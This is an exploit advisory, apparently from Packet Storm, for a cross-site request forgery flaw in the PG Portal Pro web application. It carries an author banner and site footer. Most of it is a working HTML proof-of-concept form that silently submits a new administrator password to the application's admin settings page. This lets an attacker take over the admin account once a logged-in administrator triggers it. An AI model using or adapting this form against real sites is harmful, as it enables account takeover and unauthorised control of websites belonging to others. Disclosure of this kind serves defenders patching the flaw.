PG Portal Pro suffers from a cross site request forgery vulnerability.
87c2eee2d13ad7f1553d4a02ce37bf76f5836c60972186cb2a362dd12b0aad18###########################################################
[~] Exploit Title: PG Portal pro CSRF Vulnerability
[~] Author: Noxious
[~] Team: WE SECRET
[~] Gr33tz: Fox
[~] link:http://www.hotscripts.com/listing/pg-portal-pro/
###########################################################
[CSRF Change Password]
<form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
<input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
<input type="submit" value="Save"></td></tr></table></form></div>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed